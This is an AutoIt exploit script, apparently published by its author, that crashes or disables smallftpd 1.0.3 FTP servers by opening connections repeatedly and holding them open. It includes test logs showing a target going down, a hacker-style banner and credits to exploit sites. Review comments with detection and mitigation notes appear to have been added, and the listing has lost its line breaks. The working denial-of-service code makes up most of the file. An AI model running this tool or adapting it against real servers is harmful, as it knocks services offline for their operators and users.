#NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=aas.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#cs smallftpd 1.0.3.dos.au3
smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit; This is a simple exploit written in AutoIt that crashes a remote or local smallftpd 1.0.3 FTP server. To use the exploit you have to compile it as a CUI (console) application. Official site of smallftpd 1.0.3 : => http://smallftpd.free.fr/ http://smallftpd.sourceforge.net/ http://sourceforge.net/projects/smallftpd/files/latest/download
===================================================== Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit) that runs smallftpd 1.0.3. Result: Remote denial of service; the application crashed. ===================================================== Tested (local scope) from Win XP SP 2 (32 bit) (192.168.0.1) against Win XP SP 2 32 bit (192.168.0.15) that runs smallftpd 1.0.3. Result: Remote denial of service; the application crashed. ===================================================== Tested (local scope) from Win XP SP 2 (32 bit) (192.168.0.1) against Windows 7 Ultimate SP 1 (192.168.0.15) that runs smallftpd 1.0.3 (<- in XP SP3 compatibility mode). Result: The application did not crash, but it was unable to accept any connection on port 21.
Here is the later testing result:
c:\dos\smalf\>ping 192.168.0.15
Обмен пакетами с 192.168.0.15 по 32 байт:
Ответ от 192.168.0.15: число байт=32 время=2мс TTL=128 Ответ от 192.168.0.15: число байт=32 время=5мс TTL=128cls
Статистика Ping для 192.168.0.15: Пакетов: отправлено = 2, получено = 2, потеряно = 0 (0% потерь), Приблизительное время приема-передачи в мс:
c:\dos\smalf\>telnet 192.168.0.15 21 220- smallftpd 1.0.3 220- check http://smallftpd.free.fr for more information 220 report bugs to smallftpd@free.fr � 530 Not logged in.
c:\dos\smalf\>aas.exe 192.168.0.15 21
############################################################## ########## smallftpd 1.0.3 DENIAL OF SERVICE exploit ####### ########## Usage: aas.exe REMOTEIP REMOTEPORT ########## \\\\\\\\\\ HACKING IS LIFESTYLE! ////////// ##############################################################
################ WORKING ON IT! PLEASE WAIT...################ -------------------------------------------------------------- ~ TRY count: ~ 40 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 80 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 120 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 160 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 200 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 240 -------------------------------------------------------------- ############################################################## ########## Mission Completed! @267 ########## TARGET =>ftp://192.168.0.15:21/ is * DOWN ! * ############################################################## c:\dos\smalf\>telnet 192.168.0.15 21 项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�
c:\dos\smalf\>telnet 192.168.0.15 21 Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 21: Сбой подключения
c:\dos\smalf\>ping 192.168.0.15
Обмен пакетами с 192.168.0.15 по 32 байт:
Ответ от 192.168.0.15: число байт=32 время=1мс TTL=128 Ответ от 192.168.0.15: число байт=32 время=1мс TTL=128
Статистика Ping для 192.168.0.15: Пакетов: отправлено = 2, получено = 2, потеряно = 0 (0% потерь), Приблизительное время приема-передачи в мс: Минимальное = 1мсек, Максимальное = 1 мсек, Среднее = 1 мсек Control-C ^C c:\dos\smalf\>telnet 192.168.0.15 21 Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 21: Сбой подключения
c:\dos\smalf\>ipconfig|find /i "192.168" IP-痿�� . . . . . . . . . . . . : 192.168.0.1 +庚��� 胞� . . . . . . . . . . : 192.168.0.1
/AkaStep
#ce #include <String.au3>
; Script entry: builds the console strings, checks the command line, then hands the two
; arguments to validateall().
; NOTE(review): this listing lost its original line breaks. In AutoIt a ';' starts a
; comment that runs to the end of the physical line, so statements that follow a ';' on
; the same line below would not execute exactly as laid out here.
; $f is a run of ten '#' used as banner padding. $HTTPUA is assigned but is not
; referenced anywhere else in this listing.
$f=_StringRepeat('#',10); $USE_PROTO='ftp://'; $INVALIDIP='INVALID IP FORMAT'; $INVALIDPORT='INVALID PORT NUMBER!'; $HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _ $f & " Usage: " & _ @ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _ StringReplace($f,'#','\') & _StringRepeat(' ',10) & _ 'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
; Argument check: with no arguments a message box (5-second timeout) is shown and the
; script exits; with any argument count other than two the usage banner is printed and
; the script exits.
if $CmdLine[0]=0 Then MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _ 'Invoke It from MSDOS!',5) exit; EndIf if $CmdLine[0] <> 2 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf
; Both arguments are truncated (15 and 5 characters, the lengths of 255.255.255.255 and
; 65535) before any validation happens.
$ip=StringMid($CmdLine[1],1,15);//255.255.255.255 $port=StringMid($CmdLine[2],1,5);//65535
; validateall() exits on bad input; on good input it starts the connection loop itself.
validateall($ip,$port)
; validateall($ip,$port): checks the port and address arguments, prints the banner and
; then calls downit() with the attempt counter set to 0. Any failed check writes an
; error string to the console and exits the script.
; The port must consist of digits only and must not exceed 65535.
func validateall($ip,$port) if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then ConsoleWrite($INVALIDPORT); Exit; EndIf
; The first argument is passed through TCPNameToIP(), so a host name is accepted as well;
; the result replaces $ip.
TCPStartup(); $ip=TCPNameToIP($ip); TCPShutdown();
; Split the address on '.' (Chr(46)); @error here is treated as an invalid address.
$z=StringSplit($ip,Chr(46));//Asc('.') if @error then ConsoleWrite($INVALIDIP); exit; EndIf
; $z[0] holds the element count, so the first test requires exactly four parts.
for $x=0 to $z[0] if Number($z[0]-1) <>3 Then ConsoleWrite($INVALIDIP); Exit EndIf
; Each part must be digits only and at most three characters long.
; NOTE(review): octets are not range-checked against 255, and because And/Or are
; evaluated left to right the length test also runs for $z[0] - confirm this is intended.
if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then ConsoleWrite($INVALIDIP); exit; EndIf Next
; Reset the loop variable so it can be reused as the attempt counter.
$x=0;
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)
downit($ip,$port,$x)
EndFunc; =>validateall($ip,$port)
; downit($ip,$port,$x): connection loop, implemented as a function that calls itself once
; per successful connect. $x counts the attempts.
; What the visible code does on the wire: it only calls TCPConnect(). No data is sent
; (no USER/PASS or any other FTP command) and the returned socket is never closed, so
; every successful attempt leaves one more established connection held open by the same
; client until the process exits.
; Defender notes: in server or firewall logs this looks like a burst of connections to
; the FTP port from one source address with no login attempt; the author's sample run in
; the header reports the first failed connect at attempt 267. A per-source connection
; limit and an idle/pre-login timeout in front of the service are the usual controls for
; this pattern. The server-side cause in smallftpd is not shown in this listing.
Func downit($ip,$port,$x) $x+=1; TCPStartup() $socket_con = -1 $socket_con = TCPConnect($ip, $port) If not @error Then
; Progress line on every 40th attempt, followed by a random pause of 1000-1800 ms.
if Mod($x,40)=0 Then ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF) Sleep(Random(1000,1800,1)); EndIf
; Connect succeeded: go round again with the incremented counter.
downit($ip,$port,$x)
Else
; Any TCPConnect() error ends the run and is reported as the target being down. The
; script does not distinguish a crashed service from a filtered port or a network fault,
; so this message alone is not evidence that the server process died.
Beep(1000,1500) ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _ _StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));
TCPShutdown(); exit; EndIf EndFunc; ==>downit($ip,$port,$x)
#cs
================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!* ================================================
#ce
|